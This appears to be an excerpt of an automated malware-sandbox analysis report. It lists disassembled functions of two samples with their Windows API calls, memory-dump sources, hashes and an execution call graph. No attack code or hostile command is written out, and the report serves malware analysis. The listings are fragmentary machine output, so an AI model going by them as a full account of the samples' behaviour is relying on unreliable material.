                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ??3@TextWindow$Length
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2308334395-0
                                                                                                                                                                                                                                                • Opcode ID: 8119ca7b33955cbac21e87e4fe12ba773d40effc5d925a3b7e480b00d6a2293b
                                                                                                                                                                                                                                                • Instruction ID: 2cc122b1f520d7f8021a056a959bf32eecafdcf33a956e59961b1277582e5a57
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8119ca7b33955cbac21e87e4fe12ba773d40effc5d925a3b7e480b00d6a2293b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2EF0FF32D0410DBACF01FBA5DD46CDE7B79EF04705B10406BF501720A1EA79AB559B98
                                                                                                                                                                                                                                                Function 0040702A Relevance: 6.0, APIs: 4, Instructions: 34windowCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetObjectW.GDI32(?,0000005C,?), ref: 00407045
                                                                                                                                                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 0040705B
                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000004B5), ref: 0040706F
                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000030,00000000,00000000), ref: 0040707B
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CreateFontIndirectItemMessageObjectSend
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2001801573-0
                                                                                                                                                                                                                                                • Opcode ID: 78def116b4819d627590729c5baad135a5410a8d7e74f17ad4cec64f2c4de15c
                                                                                                                                                                                                                                                • Instruction ID: 5c236ef126686a3da9008926c30106754acf3bfa0ff8e01310dffb34f405da6a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 78def116b4819d627590729c5baad135a5410a8d7e74f17ad4cec64f2c4de15c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 35F05475900704ABDB209BA4DC09F8B7BFCAB48B01F048139BD51E11D4D7B4E5018B19
                                                                                                                                                                                                                                                Function 00401BA3 Relevance: 6.0, APIs: 4, Instructions: 28COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 00401BA8
                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00401BC1
                                                                                                                                                                                                                                                • ScreenToClient.USER32(00000000,?), ref: 00401BCF
                                                                                                                                                                                                                                                • ScreenToClient.USER32(00000000,?), ref: 00401BD6
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ClientScreen$ParentRectWindow
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2099118873-0
                                                                                                                                                                                                                                                • Opcode ID: ede60c7992125a9d10b8f8c06fbaeb3be6251aeef84f0c1b655461571a46cee2
                                                                                                                                                                                                                                                • Instruction ID: 3a6f634f9500a9f0e676680e31990ed58166cb62974d534a535afb1fb6b8d00a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ede60c7992125a9d10b8f8c06fbaeb3be6251aeef84f0c1b655461571a46cee2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 09E04F722052116BCB10AFA5AC88C8BBF6DDFC5723700447AF941A2220D7709D109A61
                                                                                                                                                                                                                                                Function 00403C63 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _wtol
                                                                                                                                                                                                                                                • String ID: GUIFlags$[G@
                                                                                                                                                                                                                                                • API String ID: 2131799477-2126219683
                                                                                                                                                                                                                                                • Opcode ID: f402b0c85aba1d66b07b6addbe7eda3b1a8910d5e18cf18c534464033b9959d4
                                                                                                                                                                                                                                                • Instruction ID: b6302b9691b8fcfec91ee3c39af82f4337802e9cb3a6f407b943601295de961a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f402b0c85aba1d66b07b6addbe7eda3b1a8910d5e18cf18c534464033b9959d4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6DF03C3611C1635AFB342E0994187B6AA9CEB05793FE4443BE9C3F12D0C37C8E82825D
                                                                                                                                                                                                                                                Function 00402F10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetEnvironmentVariableW.KERNEL32(?O@,?,00000001,004177A0,00000000,00417794,?,?,00404F3F,?,?,?,?,?), ref: 00402F26
                                                                                                                                                                                                                                                • GetEnvironmentVariableW.KERNEL32(?,00000000,?,00000001,00000002,?,?,00404F3F,?,?,?,?,?), ref: 00402F52
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: EnvironmentVariable
                                                                                                                                                                                                                                                • String ID: ?O@
                                                                                                                                                                                                                                                • API String ID: 1431749950-3511380453
                                                                                                                                                                                                                                                • Opcode ID: 0f0cab1a5fe64df75075e876fd7e6a607817ca224d69030a73e0dc08c334b9f4
                                                                                                                                                                                                                                                • Instruction ID: 315e17eccb05daff3adc91fa9074d23558c2207180d60d9b2b56ce26dbf77fcb
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0f0cab1a5fe64df75075e876fd7e6a607817ca224d69030a73e0dc08c334b9f4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 24F06272200118BFDB00AFA9DC458AEB7EDEF88764B51402BF904D72A1D7B4AD008B98

                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                Execution Coverage:0.2%
                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                Signature Coverage:3.4%
                                                                                                                                                                                                                                                Total number of Nodes:175
                                                                                                                                                                                                                                                Total number of Limit Nodes:0
                                                                                                                                                                                                                                                execution_graph 1494 6bbc139c QStringGet 1495 6bbc13ab 1494->1495 1659 6bd771b6 1660 6bd771d9 1659->1660 1662 6bd771df 1659->1662 1663 6bbc3614 1660->1663 1664 6bbc361d 1663->1664 1665 6bbc362c 1664->1665 1666 6bd75633 __VEC_memcpy 1664->1666 1665->1662 1667 6bd7573d 1666->1667 1667->1662 1549 6c0861cc 1550 6c0861de 1549->1550 1552 6c0861ec @_EH4_CallFilterFunc@8 1549->1552 1551 6c06b4e4 __except_handler4 5 API calls 1550->1551 1551->1552 1453 6bbc1ab9 1454 6bbc1ad2 1453->1454 1455 6bbc1ac2 1453->1455 1457 6bbc18e8 QStringCreate QStringSet QStringCreate QStringSet 1455->1457 1458 6bbc1923 1457->1458 1458->1454 1459 6c077b80 1460 6c077bac 1459->1460 1461 6c077bb9 1459->1461 1475 6c06b4e4 1460->1475 1463 6c06b4e4 __except_handler4 5 API calls 1461->1463 1469 6c077bc9 __except_handler4 __IsNonwritableInCurrentImage 1463->1469 1464 6c077c4c 1465 6c077c22 __except_handler4 1465->1464 1466 6c077c3c 1465->1466 1467 6c06b4e4 __except_handler4 5 API calls 1465->1467 1468 6c06b4e4 __except_handler4 5 API calls 1466->1468 1467->1466 1468->1464 1469->1464 1469->1465 1483 6c08625e RtlUnwind 1469->1483 1471 6c077c9b __except_handler4 1472 6c077ccf 1471->1472 1473 6c06b4e4 __except_handler4 5 API calls 1471->1473 1474 6c06b4e4 __except_handler4 5 API calls 1472->1474 1473->1472 1474->1465 1476 6c06b4ee IsDebuggerPresent 1475->1476 1477 6c06b4ec 1475->1477 1485 6c086134 1476->1485 1477->1461 1480 6c07693e SetUnhandledExceptionFilter UnhandledExceptionFilter 1481 6c076963 GetCurrentProcess TerminateProcess 1480->1481 1482 6c07695b __except_handler4 1480->1482 1481->1461 1482->1481 1484 6c086273 1483->1484 1484->1471 1485->1480 1553 6bbc1a74 CreateThread 1554 6bbc1a89 1553->1554 1557 6bbc14e6 1553->1557 1555 6bbc1a9e 1554->1555 1556 6bbc1a91 Sleep 1554->1556 1556->1554 1556->1555 1558 6bbc14f2 __EH_prolog3 1557->1558 1560 6bbc151a 1558->1560 1563 6bbe3d77 1558->1563 1562 6bbc1544 1560->1562 1571 6bd738f8 1560->1571 1564 6bbe3d84 1563->1564 1565 6bbe3d9e 1564->1565 1575 6bbdea60 1564->1575 1579 6bd87329 1565->1579 1573 6bd7390a 1571->1573 1572 6bd7396d 1572->1562 1573->1572 1649 6bd71e40 1573->1649 1576 6bbdea76 1575->1576 1589 6bc4766c 1576->1589 1578 6bbdeace 1578->1565 1580 6bd87337 1579->1580 1605 6bd8717c 1580->1605 1582 6bbe3daa 1583 6bbe3c4f 1582->1583 1584 6bbe3c6f 1583->1584 1588 6bbe3d18 1584->1588 1621 6bda27e0 1584->1621 1585 6bbe3d75 1585->1560 1588->1585 1624 6bc31d3c 1588->1624 1590 6bc47676 1589->1590 1592 6bc47683 1590->1592 1593 6bc46c39 1590->1593 1592->1578 1594 6bc46c84 1593->1594 1597 6bc46bb1 1594->1597 1596 6bc46c94 1596->1592 1598 6bc46bbf 1597->1598 1599 6bc46bca 1597->1599 1601 6bc46892 1598->1601 1599->1596 1603 6bc468a6 1601->1603 1602 6bc468e2 1602->1599 1603->1602 1604 6c06b9e0 __VEC_memcpy 1603->1604 1604->1602 1608 6bda2bc3 1605->1608 1607 6bd8718f 1607->1582 1609 6bda2bdb 1608->1609 1610 6bda2bcc 1608->1610 1609->1607 1613 6bdc769b 1610->1613 1614 6bdc7675 1610->1614 1615 6bda0434 1610->1615 1612 6bdc7689 TlsAlloc 1612->1613 1613->1607 1614->1612 1616 6bda043e 1615->1616 1618 6bda044e 1616->1618 1619 6bddb392 CreateEventW 1616->1619 1618->1614 1620 6bddb3d3 1619->1620 1620->1618 1622 6bd738f8 __VEC_memcpy 1621->1622 1623 6bda27ec 1622->1623 1623->1588 1625 6bc31e1f 1624->1625 1627 6bc31d4f 1624->1627 1625->1585 1629 6bc31dbf 1627->1629 1630 6bda368e 1627->1630 1629->1625 1636 6bc31d0e 1629->1636 1631 6bda369c 1630->1631 1633 6bda36a8 1631->1633 1639 6bda3325 1631->1639 1643 6bd7a7f6 1633->1643 1635 6bda3710 1635->1629 1637 6bd738f8 __VEC_memcpy 1636->1637 1638 6bc31d1a 1637->1638 1638->1625 1640 6bda3333 1639->1640 1641 6bda0434 CreateEventW 1640->1641 1642 6bda3343 1641->1642 1642->1633 1644 6bd7a806 1643->1644 1645 6bd7a822 1643->1645 1647 6c06b9e0 __VEC_memcpy 1644->1647 1646 6c06b9e0 __VEC_memcpy 1645->1646 1648 6bd7a81d 1646->1648 1647->1648 1648->1635 1651 6bd71e5b 1649->1651 1652 6bd71ee8 1649->1652 1650 6bd7a7f6 __VEC_memcpy 1650->1652 1651->1650 1651->1652 1652->1572 1496 6bbc1390 1499 6bd76006 1496->1499 1500 6bd76013 1499->1500 1501 6bbc1399 1499->1501 1503 6bd75633 1500->1503 1504 6bd75640 1503->1504 1505 6c06b9e0 __VEC_memcpy 1504->1505 1506 6bd7564a 1504->1506 1505->1506 1506->1501 1507 6bd91b77 1508 6bd91b81 1507->1508 1510 6bd91ba3 1508->1510 1511 6bd0f9b2 1508->1511 1512 6bd0f9d6 1511->1512 1513 6bd0f9cc 1511->1513 1512->1510 1515 6bdd4a78 1513->1515 1516 6bdd4a91 1515->1516 1519 6bd62f4c 1516->1519 1518 6bdd4aad 1518->1512 1520 6bd62f71 1519->1520 1521 6bd62f56 1519->1521 1520->1518 1521->1520 1522 6c06b9e0 __VEC_memcpy 1521->1522 1522->1520 1653 6bbc1b73 1654 6bbc1b7c 1653->1654 1655 6bbc1b8e 1653->1655 1656 6bbc18e8 4 API calls 1654->1656 1656->1655 1657 6bdc760e 1658 6c06b208 GetCurrentThreadId 1657->1658 1523 6c076b34 TlsGetValue 1524 6c076b64 1523->1524 1525 6c076b49 1523->1525 1528 6c076a99 TlsGetValue 1525->1528 1529 6c076ad2 GetModuleHandleW 1528->1529 1530 6c076ab1 1528->1530 1532 6c076ae2 1529->1532 1533 6c076aed GetProcAddress 1529->1533 1530->1529 1531 6c076abb TlsGetValue 1530->1531 1535 6c076ac6 1531->1535 1538 6c070f17 1532->1538 1537 6c076aca TlsSetValue 1533->1537 1535->1529 1535->1537 1537->1524 1539 6c070f22 Sleep GetModuleHandleW 1538->1539 1540 6c070f44 1539->1540 1541 6c070f40 1539->1541 1540->1533 1540->1537 1541->1539 1541->1540 1542 6c06e2bf 1543 6c06e372 1542->1543 1546 6c076986 1543->1546 1545 6c06e378 1547 6c076a99 __decode_pointer 6 API calls 1546->1547 1548 6c076996 1547->1548 1548->1545 1486 6bd7454b 1487 6bd74555 1486->1487 1488 6bd74568 1486->1488 1488->1487 1490 6c06b9e0 1488->1490 1491 6c06b9f8 1490->1491 1492 6c06ba1f __VEC_memcpy 1491->1492 1493 6c06ba27 1491->1493 1492->1493 1493->1487

                                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                                Function 6C06B4E4 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 6C07692C
                                                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6C076941
                                                                                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(6C2408B4), ref: 6C07694C
                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 6C076968
                                                                                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000), ref: 6C07696F
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000010.00000002.2312355475.000000006BBC1000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BBC0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000010.00000002.2312321940.000000006BBC0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000010.00000002.2331881203.000000006C117000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000010.00000002.2331881203.000000006C208000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000010.00000002.2331881203.000000006C257000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000010.00000002.2340785230.000000006C2D8000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000010.00000002.2340868298.000000006C2DD000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000010.00000002.2340905408.000000006C2DF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000010.00000002.2341070166.000000006C2EA000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000010.00000002.2341114678.000000006C2EC000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000010.00000002.2341439033.000000006C302000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000010.00000002.2341628934.000000006C307000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000010.00000002.2341670339.000000006C30A000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_6bbc0000_iScrPaint.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2579439406-0
                                                                                                                                                                                                                                                • Opcode ID: 4494c9d4217b57442811599cb199e90558d53322e1ed481f9a752a247646e8b4
                                                                                                                                                                                                                                                • Instruction ID: e5e4b8e7d1497459ba40617549f6bbf590857048409e89d059fe3fe3b426c150
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4494c9d4217b57442811599cb199e90558d53322e1ed481f9a752a247646e8b4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4421EDB6B053448BCF01DF69C58AA443BB8BB0B320F50545FE80AC7B80E7B85A81CF95
                                                                                                                                                                                                                                                Function 6BBC14E6 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 72COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • 2PostSignal(int,int,int,int), xrefs: 6BBC1579
                                                                                                                                                                                                                                                • 1SendSlot(int,int,int,int,int *), xrefs: 6BBC1556
                                                                                                                                                                                                                                                • 2SendSignal(int,int,int,int,int *), xrefs: 6BBC155C
                                                                                                                                                                                                                                                • 1PostSlot(int,int,int,int), xrefs: 6BBC1573
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000010.00000002.2312355475.000000006BBC1000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BBC0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000010.00000002.2312321940.000000006BBC0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000010.00000002.2331881203.000000006C117000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000010.00000002.2331881203.000000006C208000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000010.00000002.2331881203.000000006C257000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000010.00000002.2340785230.000000006C2D8000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000010.00000002.2340868298.000000006C2DD000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000010.00000002.2340905408.000000006C2DF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000010.00000002.2341070166.000000006C2EA000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000010.00000002.2341114678.000000006C2EC000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000010.00000002.2341439033.000000006C302000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000010.00000002.2341628934.000000006C307000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000010.00000002.2341670339.000000006C30A000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_6bbc0000_iScrPaint.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: H_prolog3
                                                                                                                                                                                                                                                • String ID: 1PostSlot(int,int,int,int)$1SendSlot(int,int,int,int,int *)$2PostSignal(int,int,int,int)$2SendSignal(int,int,int,int,int *)
                                                                                                                                                                                                                                                • API String ID: 431132790-2266928568
                                                                                                                                                                                                                                                • Opcode ID: c3608ae5938e43241bf96f6e6f2672b58efe1db8ffa26d910a8e58758bc56fd3
                                                                                                                                                                                                                                                • Instruction ID: c0066563d5a3ffe30731864b79e101b1d9187421e8f1ea9c867274c750b16068
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c3608ae5938e43241bf96f6e6f2672b58efe1db8ffa26d910a8e58758bc56fd3
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4E21C6F2B00255AFDB14DFF88881BADB6B4EB05724F10852FE515FB6C1DB7889018B51
                                                                                                                                                                                                                                                Function 6BBC18E8 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • QStringCreate.WEBUI(?,?,?,6BBC1AD2,00000000,webkitcreate,?), ref: 6BBC18F1
                                                                                                                                                                                                                                                • QStringSet.WEBUI(00000000,?,?,?,?,6BBC1AD2,00000000,webkitcreate,?), ref: 6BBC18FD
                                                                                                                                                                                                                                                  • Part of subcall function 6BBC1338: __EH_prolog3.LIBCMT ref: 6BBC133F
                                                                                                                                                                                                                                                • QStringCreate.WEBUI(00000000,?,?,?,?,6BBC1AD2,00000000,webkitcreate,?), ref: 6BBC1902
                                                                                                                                                                                                                                                • QStringSet.WEBUI(00000000,00000000,00000000,?,?,?,?,6BBC1AD2,00000000,webkitcreate,?), ref: 6BBC190C
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000010.00000002.2312355475.000000006BBC1000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BBC0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000010.00000002.2312321940.000000006BBC0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000010.00000002.2331881203.000000006C117000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000010.00000002.2331881203.000000006C208000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000010.00000002.2331881203.000000006C257000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000010.00000002.2340785230.000000006C2D8000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000010.00000002.2340868298.000000006C2DD000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000010.00000002.2340905408.000000006C2DF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000010.00000002.2341070166.000000006C2EA000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000010.00000002.2341114678.000000006C2EC000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000010.00000002.2341439033.000000006C302000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000010.00000002.2341628934.000000006C307000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000010.00000002.2341670339.000000006C30A000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_6bbc0000_iScrPaint.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: String$Create$H_prolog3
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3317808019-0
                                                                                                                                                                                                                                                • Opcode ID: b26498ebdaec808e69169cc70a7ce7b30c571fb76c8d7e64d58460d9ac02194e
                                                                                                                                                                                                                                                • Instruction ID: 1cb1252e9ad78821f5fd182c1eb36ee3dc197de8fef448591e029e4d5a778e33
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b26498ebdaec808e69169cc70a7ce7b30c571fb76c8d7e64d58460d9ac02194e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B5E08C732002A07AD7019AB04C82F7F76ACEBE9A5EF18001AF64072140871C8C229277

                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                Execution Coverage:2%
                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                                                                                Total number of Nodes:22
                                                                                                                                                                                                                                                Total number of Limit Nodes:0

                                                                                                                                                                                                                                                Callgraph

                                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                                Function 6B6FB4E4 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 6B70692C
                                                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6B706941
                                                                                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(6B8D08B4), ref: 6B70694C
                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 6B706968
                                                                                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000), ref: 6B70696F
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000011.00000002.2365800662.000000006B6A6000.00000020.00000001.01000000.00000014.sdmp, Offset: 6B250000, based on PE: true
